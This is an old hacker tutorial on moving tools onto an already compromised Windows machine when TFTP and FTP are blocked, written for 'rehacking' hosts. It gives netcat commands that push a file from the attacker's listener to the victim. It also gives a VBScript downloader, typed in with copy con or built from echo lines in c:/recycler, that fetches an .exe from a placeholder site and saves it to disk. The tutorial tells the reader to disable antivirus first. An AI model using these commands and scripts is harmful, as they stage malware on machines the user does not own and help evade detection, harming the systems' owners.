Additional File Transfer Methods

Data transfer without TFTP or FTP
This text describes how to get files onto a remote host you already have a shell on when neither TFTP nor FTP is available. It covers file transfer with Netcat and downloading files from the web with a .vbs script.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

**********************************************************************************
*Tutorial on getting the stuff onto a stro when the machine has no TFTP or FTP.  *
*Tutorial Written By: DiabloHorn                                                 *
*Comment: This is intended mostly for rehacking, sometimes for hacking new ones. *
*Creditz: Kimatrix, www.google.com                                               *
*COMMENT: This is mostly intended for downloading wget.exe; don't try to         *
*download big things like Serv-U with it.                                        *
**********************************************************************************


Index

0) Opening Words
1) The Netcat Way
2) .vbs script
3) Greetz

**********************************************************************************************************
*					0) Opening Words						 *
**********************************************************************************************************
Hmm, what shall I say this time?
Oh yeah, I'm trying to improve my English; I hope you will one day read tutorials of mine written in perfect English.
Pretty impossible, but I'll try.
Well, about the tutorial you are about to read: it is meant for when you are on a machine, you've got
a shell, but typing the tftp or ftp command to get your files onto it returns:

"ftp" command not recognized, or some similar error.

If that error sounds familiar, then this tutorial might be for you.
I say might, because if telnet is also deactivated then, well, too bad.
Hope you are all still awake, so read on and get started.

**********************************************************************************************************
*					1) The Netcat Way						 *
**********************************************************************************************************
Sub-Index

1) Purpose
2) Tools Needed
3) HowTo

1)	Purpose

Using two Netcat instances to transfer a file

2)	Tools Needed

- A shell on the target
- Netcat on both machines
- The file to transfer

3)	HowTo

Fire up netcat on your machine like this:

nc.exe -l -p 4455 -u -vvv < file.exe

When done fire up netcat on the hacked machine like this:

nc.exe -u host port > outputfile.exe

When this is done there will be a connection, but nothing will be sent until your listener receives a
character, so in the netcat running on the hacked machine (i.e. in your remote shell) just type
something ("a" would be enough) and hit enter.
Now the stupid part: with this you have no idea how long the transfer will take, so I suggest you DON'T
transfer Serv-U with this, but rather something small like wget.exe, and then just download the rest from the web.
This has been tested both locally and remotely with normal access to the shell, so just tweak it until it works for you.
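
To make that concrete, here is a minimal sketch of both ends. The address 10.0.0.5, port 4455 and the
file name wget.exe are just example values; use your own IP, a port you can actually reach, and
whatever file you want to push.

On your own machine (the sender, listening with the file as input):

nc.exe -l -p 4455 -u -vvv < wget.exe

On the hacked machine (the receiver, writing whatever arrives to disk):

nc.exe -u 10.0.0.5 4455 > wget.exe

Then type a single character into the receiving netcat and hit enter to kick things off. UDP gives you
no end-of-transfer signal, so give it some time, press CTRL+C on both ends and compare the file size on
the target with the original. If the target allows outbound TCP, the same two commands without -u are
worth a try as well.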



**********************************************************************************************************
*					2) .vbs script						 *
**********************************************************************************************************
Sub-Index

1) Purpose
2) Tools Needed
3) HowTo


1)	Purpose

This is meant to create a .vbs script that downloads a file from the web.
It is similar to wget, but it doesn't need to be uploaded first, and it also works when the tftp, ftp
and net commands are disabled.


2)	Tools Needed

- A shell
- A command-line editor
- If no command-line editor is available, the "echo" command

3)	HowTo

First of all, make sure any anti-virus is disabled, because a .vbs file like this sometimes gets
caught by antivirus programs.

First I'll discuss the command-line editor option,
then I'll discuss the echo option.

########Commandline editor option####################

First of all, go to the directory you want the file to be downloaded to, for example:

///////////////
cd c:/Recycler
///////////////

When done, do this:

/////////////////
copy con get.vbs
/////////////////

When this is done you can immediately start typing text, so type the following lines:

//////////////////////////////////////////////////////////////////////////////////////////
Dim DataBin										 /
Dim HTTPGET										 /
Set HTTPGET = CreateObject("Microsoft.XMLHTTP")						 /
HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False				 /
HTTPGET.Send										 /
DataBin = HTTPGET.ResponseBody								 /
Const adTypeBinary=1									 /
Const adSaveCreateOverWrite=2								 /
Dim SendBinary										 /
Set SendBinary = CreateObject("ADODB.Stream")						 /
SendBinary.Type = adTypeBinary								 /
SendBinary.Open										 /
SendBinary.Write DataBin								 /
SendBinary.SaveToFile "c:/file.exe", adSaveCreateOverWrite				 /
//////////////////////////////////////////////////////////////////////////////////////////

Things you MUST change in the above code:

////////////////////////////////////////////////////////////////////////////
HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False            /
  Change that URL to wherever your OWN .exe file is hosted.                /
SendBinary.SaveToFile "c:/file.exe", adSaveCreateOverWrite                 /
  Change that to the name and place you want the downloaded file saved to. /
////////////////////////////////////////////////////////////////////////////

When you are done typing the above, save the file by pressing CTRL+Z followed by enter. When the file
is saved, run the script as shown below and wait till the file is downloaded.
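
A .vbs is not a real .exe; it runs through the Windows Script Host. If just typing the name doesn't
start it, the console version of the script host (cscript, which ships with Windows) should do it.
Assuming the script still sits in c:\recycler\ as in the example above:

cscript //nologo c:\recycler\get.vbs

The //nologo switch only hides the version banner; without it the command works the same. The download
happens silently, so give it a moment before you go looking for the file.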

########ECHO option####################

////////////////////////////////////////////////////////////////////////////////////////////
echo Dim DataBin >c:/recycler/get.vbs							   /
echo Dim HTTPGET >>c:/recycler/get.vbs							   /
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:/recycler/get.vbs   		   /
echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False >>c:/recycler/get.vbs / 
echo HTTPGET.Send >>c:/recycler/get.vbs							   /
echo DataBin = HTTPGET.ResponseBody >>c:/recycler/get.vbs				   /
echo Const adTypeBinary=1 >>c:/recycler/get.vbs						   /
echo Const adSaveCreateOverWrite=2 >>c:/recycler/get.vbs				   /
echo Dim SendBinary >>c:/recycler/get.vbs						   /
echo Set SendBinary = CreateObject("ADODB.Stream") >>c:/recycler/get.vbs		   /
echo SendBinary.Type = adTypeBinary >>c:/recycler/get.vbs				   /
echo SendBinary.Open >>c:/recycler/get.vbs						   /
echo SendBinary.Write DataBin >>c:/recycler/get.vbs					   /
echo SendBinary.SaveToFile "c:/file.exe", adSaveCreateOverWrite >>c:/recycler/get.vbs	   /
////////////////////////////////////////////////////////////////////////////////////////////

Things you MUST change in the above code:

////////////////////////////////////////////////////////////////////////////
HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False            /
  Change that URL to wherever your OWN .exe file is hosted.                /
SendBinary.SaveToFile "c:/file.exe", adSaveCreateOverWrite                 /
  Change that to the name and place you want the downloaded file saved to. /
////////////////////////////////////////////////////////////////////////////

When done, run the script the same way as described above and wait till the file is downloaded; a quick sanity check is shown below.
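
Because the echo lines are easy to mistype, it can be worth checking the generated script and the
result before relying on it. The paths below simply follow the example above; adjust them if you
changed anything:

type c:\recycler\get.vbs
cscript //nologo c:\recycler\get.vbs
dir c:\file.exe

The type command shows the fourteen lines you echoed (watch for missing quotes), and the dir at the end
just confirms that file.exe landed where the SaveToFile line says it should.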

**********************************************************************************************************
*					3) Greetz							 *
**********************************************************************************************************


To the wonderful world of the internet, and to Kimatrix for helping me test the Netcat part.

Hack it all, just don't break it all.

Also want to say thanks to all the peeps on NFE who gave me a nice place to learn new things quickly
and to help other peeps out with my knowledge.